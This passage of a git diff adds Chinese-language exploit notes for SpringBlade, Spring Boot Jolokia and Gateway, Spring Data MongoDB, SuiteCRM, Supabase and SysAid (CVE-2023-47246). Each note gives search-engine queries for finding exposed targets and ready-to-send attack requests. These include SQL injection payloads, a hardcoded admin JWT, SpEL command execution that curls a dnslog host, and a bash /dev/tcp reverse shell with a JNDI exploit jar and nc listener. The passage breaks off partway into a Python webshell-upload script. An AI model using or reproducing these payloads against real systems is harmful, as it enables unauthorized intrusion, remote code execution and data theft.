+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Connection: close
+```
+
+![1722874954212-1f03a047-380f-4f1e-8ed9-65fab9ab13ba.png](./img/0xN12jNa7AiTLwb2/1722874954212-1f03a047-380f-4f1e-8ed9-65fab9ab13ba-625732.png)
+
+
+
+> 更新: 2024-12-13 17:10:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ocwnh58qqdgndhlk>
\ No newline at end of file
diff --git a/SpringBladetenant-list存在SQL注入漏洞.md b/SpringBladetenant-list存在SQL注入漏洞.md
new file mode 100644
index 0000000..4a48835
--- /dev/null
+++ b/SpringBladetenant-list存在SQL注入漏洞.md
@@ -0,0 +1,31 @@
+# SpringBlade tenant-list存在SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade tenant-list存在SQL注入漏洞，攻击者利用该漏洞进行SQL注 入攻击
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/01HOTDbFk8XLc-SW/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-948490.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,md5(123456),0x7e),1)=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+```
+
+![1716997675480-3df10816-9fd3-4a5b-9919-73fe9e7af8cd.png](./img/01HOTDbFk8XLc-SW/1716997675480-3df10816-9fd3-4a5b-9919-73fe9e7af8cd-781690.png)
+
+```java
+e10adc3949ba59abbe56e057f20f883
+```
+
+
+
+> 更新: 2024-12-13 17:10:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tt8olbrv29tcosdn>
\ No newline at end of file
diff --git a/SpringBladeuser-list存在敏感信息泄露漏洞.md b/SpringBladeuser-list存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..af848b3
--- /dev/null
+++ b/SpringBladeuser-list存在敏感信息泄露漏洞.md
@@ -0,0 +1,28 @@
+# SpringBlade user-list存在敏感信息泄露漏洞
+
+# 一、漏洞简介
+SpringBlade user-list存在敏感信息泄露漏洞
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/kDsv0JfSIt1Ixdvd/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-700920.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-user/user-list HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Connection: close
+```
+
+![1722874765706-4a275b38-6986-4e1e-a324-7ef2c8b9fa24.png](./img/kDsv0JfSIt1Ixdvd/1722874765706-4a275b38-6986-4e1e-a324-7ef2c8b9fa24-855020.png)
+
+
+
+> 更新: 2024-12-13 17:10:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mcvxfkt0ki0867bi>
\ No newline at end of file
diff --git a/SpringBladeusual-list存在SQL注入漏洞.md b/SpringBladeusual-list存在SQL注入漏洞.md
new file mode 100644
index 0000000..04c0244
--- /dev/null
+++ b/SpringBladeusual-list存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# SpringBlade usual-list存在SQL注入漏洞
+
+# 一、漏洞简介
+SpringBlade usual-list存在SQL注入漏洞，攻击者利用该漏洞进行SQL注入攻击
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/UrhsBBU4enGgnTv_/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-979030.png)
+
+# 四、漏洞复现
+```java
+GET /api/blade-log/usual/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Connection: close
+```
+
+![1722874655789-f2bdb393-4984-4ec8-b3fc-686b5e59b4ca.png](./img/UrhsBBU4enGgnTv_/1722874655789-f2bdb393-4984-4ec8-b3fc-686b5e59b4ca-732552.png)
+
+
+
+> 更新: 2024-12-13 17:10:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xkw7kw5b99sih1la>
\ No newline at end of file
diff --git a/SpringBlade存在硬编码密钥漏洞.md b/SpringBlade存在硬编码密钥漏洞.md
new file mode 100644
index 0000000..f661a5c
--- /dev/null
+++ b/SpringBlade存在硬编码密钥漏洞.md
@@ -0,0 +1,30 @@
+# SpringBlade 存在硬编码密钥漏洞
+
+# 一、漏洞简介
+SpringBlade 存在硬编码密钥漏洞。
+
+# 二、影响版本
++ SpringBlade
+
+# 三、资产测绘
++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>`
+
+![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/PHANNrjTK85iKF79/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-649072.png)
+
+# 四、漏洞复现
+```plain
+GET /api/blade-user/info HTTP/1.1
+Host: 
+User-Agent: python-requests/2.31.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+```
+
+![1711951677631-572e0290-8233-4ed1-898a-f96f1c73c3ba.png](./img/PHANNrjTK85iKF79/1711951677631-572e0290-8233-4ed1-898a-f96f1c73c3ba-191658.png)
+
+
+
+> 更新: 2024-12-13 17:10:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ffc80mpe9xmcekvp>
\ No newline at end of file
diff --git a/SpringBootjolokiaRealmJNDI远程代码执行漏洞.md b/SpringBootjolokiaRealmJNDI远程代码执行漏洞.md
new file mode 100644
index 0000000..f2009d7
--- /dev/null
+++ b/SpringBootjolokiaRealmJNDI远程代码执行漏洞.md
@@ -0,0 +1,87 @@
+# Spring Boot jolokia Realm JNDI远程代码执行漏洞
+
+# 一、漏洞简介
+Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时，它会自动将多个端点注册到路由进程中。当配置`jolokia/list`接口，且访问`jolokia/list`接口存在`type=MBeanFactory`和`createJNDIRealm`关键字时，存在`Spring jolokia Realm JNDI`远程代码执行漏洞。
+
+## 二、影响版本	
++ Spring Boot < 1.5 默认未授权访问所有端点
++ Spring Boot >= 1.5 默认只允许访问/health和/info端点，但是此安全性通常被应用程序开发人员禁用
+
+Spring Boot 1.x版本端点在根URL下注册。
+
+![1698576714277-71a73073-04b0-4a3c-966d-bba57e4944b9.png](./img/lD151wknq39V0bAQ/1698576714277-71a73073-04b0-4a3c-966d-bba57e4944b9-347569.png)
+
+Spring Boot 2.x版本端点移动到/actuator/路径。
+
+![1698576733486-183446b7-1066-4c12-9181-e16cb0df831d.png](./img/lD151wknq39V0bAQ/1698576733486-183446b7-1066-4c12-9181-e16cb0df831d-027623.png)
+
+# 三、系统特征
+1. 网站图片文件是一个绿色的树叶。
+
+
+
+![1698576979706-f936398d-5236-4f6d-a518-474733394877.png](./img/lD151wknq39V0bAQ/1698576979706-f936398d-5236-4f6d-a518-474733394877-560639.png)
+
+2. 特有的报错信息。
+
+![1698576999220-8efdd199-4150-4cab-80c5-6d727340149c.png](./img/lD151wknq39V0bAQ/1698576999220-8efdd199-4150-4cab-80c5-6d727340149c-322932.png)
+
+3. 存在`/jolokia/list`接口
+
+![1698577033216-3270b605-0da8-421d-97f8-cfc8baa55626.png](./img/lD151wknq39V0bAQ/1698577033216-3270b605-0da8-421d-97f8-cfc8baa55626-943670.png)
+
+# 四、漏洞复现
+1. 确认存在`type=MBeanFactory`和`createJNDIRealm`关键字时，存在Spring jolokia Realm JNDI远程代码执行漏洞
+
+![1698577944981-d1cd174f-c5f9-4361-9b31-2c765873cdf8.png](./img/lD151wknq39V0bAQ/1698577944981-d1cd174f-c5f9-4361-9b31-2c765873cdf8-560420.png)
+
+![1698578013109-7e54d965-932c-4f56-80c0-9d1d0fd17a52.png](./img/lD151wknq39V0bAQ/1698578013109-7e54d965-932c-4f56-80c0-9d1d0fd17a52-816439.png)
+
+2. 生成反弹shell命令
+
+```plain
+/bin/bash -i >& /dev/tcp/xx.xx.xx.xx/7777 0>&1
+```
+
+2. 将上述反弹shell命令base64编码后替换到下述`command`字符处，`vps`处填写为`vps ip`
+
+```plain
+java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,command}|{base64,-d}|{bash,-i}" -A "vps"
+```
+
+3. 将`JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar`上传到vps中运行上述命令
+
+[JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222253187-2cb205fa-03a1-4c83-b20d-15ef97031929.jar)
+
+![1698577387014-60a6f59b-e08b-46ae-8cd0-2adbd24dc7dc.png](./img/lD151wknq39V0bAQ/1698577387014-60a6f59b-e08b-46ae-8cd0-2adbd24dc7dc-960558.png)
+
+4. 修改 expliot 中的 url 和 rmi 地址
+
+[exploit.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709222253494-e1aea116-ca7d-4438-bcaa-3c9b5188ff09.py)
+
+![1698577518599-c06c9711-aace-4078-a8f8-ec67e5d0e4a8.png](./img/lD151wknq39V0bAQ/1698577518599-c06c9711-aace-4078-a8f8-ec67e5d0e4a8-478851.png)
+
+![1698577467774-16a487a1-d095-4973-ac7e-9320596f094f.png](./img/lD151wknq39V0bAQ/1698577467774-16a487a1-d095-4973-ac7e-9320596f094f-552345.png)
+
+4. nc 监听端口
+
+```plain
+nc -lvvp 7777
+```
+
+![1698577554789-09ca2754-5c88-4810-8889-e9c6b9fbe0d1.png](./img/lD151wknq39V0bAQ/1698577554789-09ca2754-5c88-4810-8889-e9c6b9fbe0d1-869854.png)
+
+5. 执行exp收到反弹shell
+
+```plain
+python3 exploit.py
+```
+
+![1698577713992-325f1991-81a1-4e32-9088-607fffc268ef.png](./img/lD151wknq39V0bAQ/1698577713992-325f1991-81a1-4e32-9088-607fffc268ef-793843.png)
+
+![1698577666540-851adfb8-d788-44e5-807b-276e44ee32a4.png](./img/lD151wknq39V0bAQ/1698577666540-851adfb8-d788-44e5-807b-276e44ee32a4-019562.png)
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/asne342gkdk4cde8>
\ No newline at end of file
diff --git a/SpringDataMongoDBSpEL表达式注入漏洞.md b/SpringDataMongoDBSpEL表达式注入漏洞.md
new file mode 100644
index 0000000..d52fcda
--- /dev/null
+++ b/SpringDataMongoDBSpEL表达式注入漏洞.md
@@ -0,0 +1,42 @@
+# Spring Data MongoDB SpEL表达式注入漏洞
+
+# 一、漏洞描述
+Spring官方发布了关于Spring Data MongoDB SpEL表达式注入漏洞的修复信息，当使用@Query或@Aggregation注解进行查询时，若通过SpEL表达式中形如“?0”的占位符来进行参数赋值，同时应用程序未对用户输入进行过滤处理，则可能受到SpEL表达式注入的影响，成功利用该漏洞的攻击者可在目标服务器上执行代码。
+
+# 二、影响版本
+Spring Data MongoDB == 3.4.0
+
+3.3.0 <= Spring Data MongoDB <= 3.3.4
+
+旧的、不受支持的版本也会受到影响
+
+# 三、资产测绘
+```plain
+
+```
+
+![1730011780302-72a7fb38-c2c2-4f89-bf47-cdd8f776e224.png](./img/ZExlZ6n1pcklAxos/1730011780302-72a7fb38-c2c2-4f89-bf47-cdd8f776e224-536417.png)
+
+# 三、漏洞复现
+```plain
+#更新
+/name=T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('apt-get update')
+
+#下载curl
+/name=T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('apt-get install -y curl')
+```
+
+执行curl dnslog
+
+```plain
+/?name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27curl%20hrnceuwsrl.iyhc.eu.org%27)
+```
+
+![1730012025414-b5771bdf-4af2-42ab-873f-54933df0e54b.png](./img/ZExlZ6n1pcklAxos/1730012025414-b5771bdf-4af2-42ab-873f-54933df0e54b-779912.png)
+
+
+
+
+
+> 更新: 2024-11-27 10:04:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dcbhf1pnmuar814k>
\ No newline at end of file
diff --git a/SpringEureka存在actuator未授权漏洞.md b/SpringEureka存在actuator未授权漏洞.md
new file mode 100644
index 0000000..d3e5627
--- /dev/null
+++ b/SpringEureka存在actuator未授权漏洞.md
@@ -0,0 +1,19 @@
+# SpringEureka存在actuator未授权漏洞
+
+# 一、漏洞描述
+SpringEureka存在actuator未授权漏洞
+
+# 二、影响版本
+![1724658132224-af3f921b-3ac2-4c1f-bb1a-75222ada73e7.png](./img/dARwOcEzLZ2YhwMy/1724658132224-af3f921b-3ac2-4c1f-bb1a-75222ada73e7-850357.png)
+
+# 三、漏洞复现
+```plain
+/actuator/env
+```
+
+![1724658154695-2ae6085c-ad26-4025-b0b1-4c1a1adc42ff.png](./img/dARwOcEzLZ2YhwMy/1724658154695-2ae6085c-ad26-4025-b0b1-4c1a1adc42ff-511519.png)
+
+
+
+> 更新: 2024-09-05 23:24:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vxhc3yrf6eae9gtd>
\ No newline at end of file
diff --git a/Springbootgateway存在命令执行漏洞.md b/Springbootgateway存在命令执行漏洞.md
new file mode 100644
index 0000000..4d8597a
--- /dev/null
+++ b/Springbootgateway存在命令执行漏洞.md
@@ -0,0 +1,89 @@
+# Spring boot gateway存在命令执行漏洞
+
+# 一、漏洞描述
+Spring boot gateway存在命令执行漏洞
+
+# 二、影响版本
+Spring boot actuator未授权
+
+# 三、资产测绘
+```plain
+/actuator/gateway/  接口存在
+```
+
+![1730259600146-25661149-dd5e-4032-9a0c-1c1c822d05be.png](./img/N0O-b9s0Otwvz0JD/1730259600146-25661149-dd5e-4032-9a0c-1c1c822d05be-729423.png)
+
+# 三、漏洞复现
+1. <font style="color:rgba(0, 0, 0, 0.9);">构造poc1创建hacker文件：</font>
+
+```plain
+POST /actuator/gateway/routes/jeecg-demo HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/json
+Content-Length: 333
+
+{
+  "id": "/jeecg-demo",
+  "filters": [{
+    "name": "AddResponseHeader",
+    "args": {
+      "name": "Result",
+      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
+    }
+  }],
+  "uri": "http://example.com"
+}
+
+```
+
+![1730259826668-97743867-3d03-439c-9fd3-431b8ae57efd.png](./img/N0O-b9s0Otwvz0JD/1730259826668-97743867-3d03-439c-9fd3-431b8ae57efd-354366.png)
+
+2、刷新路由
+
+```plain
+POST /actuator/gateway/refresh HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Cookie: __51uvsct__JuHMLCp1r3cB6ggB=1; __51vcke__JuHMLCp1r3cB6ggB=8bfe73d5-e527-5232-9cbe-1f2983c556d9; __51vuft__JuHMLCp1r3cB6ggB=1681223932313
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Priority: u=1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+```
+
+![1730259859862-7d54ce26-aedd-4fe3-be7f-158cb5062a3e.png](./img/N0O-b9s0Otwvz0JD/1730259859862-7d54ce26-aedd-4fe3-be7f-158cb5062a3e-429367.png)
+
+3、查看回显
+
+```plain
+GET /actuator/gateway/routes/jeecg-demo HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+```
+
+![1730259885785-61015288-0875-478c-b1c5-3b7b5f2c405b.png](./img/N0O-b9s0Otwvz0JD/1730259885785-61015288-0875-478c-b1c5-3b7b5f2c405b-981370.png)
+
+
+
+> 更新: 2024-11-27 10:04:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gl2g116gzest4e6t>
\ No newline at end of file
diff --git a/SuiteCRMresponseEntryPoint存在SQL注入漏洞.md b/SuiteCRMresponseEntryPoint存在SQL注入漏洞.md
new file mode 100644
index 0000000..e1766d8
--- /dev/null
+++ b/SuiteCRMresponseEntryPoint存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+# SuiteCRM responseEntryPoint存在SQL注入漏洞
+
+# 一、漏洞简介
+SuiteCRM存在SQL注入漏洞，未经身份验证的远程攻击者可以通过该漏洞拼接执行SQL注入语句，从而获取数据库敏感信息。
+
+# 二、影响版本
++ SuiteCRM
+
+# 三、资产测绘
+```plain
+title="SuiteCRM"
+```
+
+![1721616680565-4373451c-6a4b-4181-b8cc-42171ab43ac1.png](./img/xYNk3xzrkGpeK4r-/1721616680565-4373451c-6a4b-4181-b8cc-42171ab43ac1-982759.png)
+
+# 四、漏洞复现
+```plain
+GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip
+Connection: close
+```
+
+![1721616810604-b8692135-f0dd-4e90-bc63-5a59fa4a44c8.png](./img/xYNk3xzrkGpeK4r-/1721616810604-b8692135-f0dd-4e90-bc63-5a59fa4a44c8-002834.png)
+
+
+
+> 更新: 2024-08-12 17:16:00  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/scs5n834l406n097>
\ No newline at end of file
diff --git a/Supabasequery存在SQL注入漏洞.md b/Supabasequery存在SQL注入漏洞.md
new file mode 100644
index 0000000..9c39904
--- /dev/null
+++ b/Supabasequery存在SQL注入漏洞.md
@@ -0,0 +1,45 @@
+# Supabase query存在SQL注入漏洞
+
+# 一、漏洞简介
+Supabase是一个开源的Firebase替代品，提供了一系列的后端功能，让你可以更快地构建产品。它使用PostgreSQL作为数据库，支持SQL和RESTful API访问。此外，Supabase提供了完整的认证系统，支持邮箱、手机号、第三方服务等多种登录方式。Supabase 存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息甚至可获得服务器权限。
+
+# 二、影响版本
++ Supabase
+
+# 三、资产测绘
++ hunter`app.name="Supabase"`
++ 特征
+
+![1701170235545-bdaa2d9d-5918-4200-b9e7-7b89025dcb08.png](./img/xJRj9JN6yjABftPr/1701170235545-bdaa2d9d-5918-4200-b9e7-7b89025dcb08-568605.png)
+
+# 四、漏洞复现
+```plain
+POST /api/pg-meta/default/query HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: application/json
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 103
+
+{"query":"(SELECT CONCAT(CONCAT('qjpzq',(CASE WHEN (2016=2016) THEN '1' ELSE '0' END)),'qkbbq'))"}
+```
+
+![1701170299913-9a46ea32-48ba-4adb-83f8-1e8e52b81aab.png](./img/xJRj9JN6yjABftPr/1701170299913-9a46ea32-48ba-4adb-83f8-1e8e52b81aab-284336.png)
+
+sqlmap
+
+```plain
+POST /api/pg-meta/default/query HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: application/json
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 103
+
+{"query":""}
+```
+
+![1701170323505-a6156120-f091-409e-aeb7-4d96a390a4e4.png](./img/xJRj9JN6yjABftPr/1701170323505-a6156120-f091-409e-aeb7-4d96a390a4e4-551880.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsa0ghyt670h5o3q>
\ No newline at end of file
diff --git a/SysAid远程命令执行漏洞(CVE-2023-47246).md b/SysAid远程命令执行漏洞(CVE-2023-47246).md
new file mode 100644
index 0000000..7374ce5
--- /dev/null
+++ b/SysAid远程命令执行漏洞(CVE-2023-47246).md
@@ -0,0 +1,224 @@
+## SysAid远程命令执行漏洞（CVE-2023-47246）
+
+## 漏洞影响版本
+SysAid Server<23.3.36
+
+## 网络空间搜索
+```
+fofa：body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
+shodan：http.favicon.hash:1540720428
+zoomeye：app:"SysAid On-Prem Software"
+hunter.how：favicon_hash="5f30870725d650d7377a134c74f41cfd"
+```
+
+## poc
+```
+POST /userentry?accountId=/../../../tomcat/webapps/UIHM3/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 87
+
+xœðffa``à`H­*ç©«¿Áä±
+```
+![fb5ab4bdde18a3c8f92a3c0d5d2b23c9](https://github.com/wy876/POC/assets/139549762/f0e899f9-0d0f-4bda-9b1b-8d6f3151d290)
+
+![3dad5ed7f4a321562ad6c74ee9a9edf1](https://github.com/wy876/POC/assets/139549762/1b81f98e-2599-4622-8c24-c2543a543544)
+
+## Exp脚本
+
+```python
+import argparse
+import binascii
+import random
+import time
+import zipfile
+import zlib
+import urllib3
+import requests
+
+urllib3.disable_warnings()
+
+def compressFile(shellFile, warFile):
+    try:
+        with zipfile.ZipFile(warFile, 'w', zipfile.ZIP_DEFLATED) as zipf:
+            zipf.write(shellFile)
+        zipf.close()
+        return True
+    except:
+        return False
+
+
+def getHexData(warFile):
+    with open(warFile, 'rb') as warfile:
+        data = warfile.read()
+    warfile.close()
+    compressed_data = zlib.compress(data)
+    hex_data = binascii.hexlify(compressed_data).decode()
+    return hex_data
+
+
+def generateRandomDirectoryName(num):
+    charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
+    return ''.join(random.choice(charset) for _ in range(num))
+
+
+def get_random_agent():
+    agent_list = [
+        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
+        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
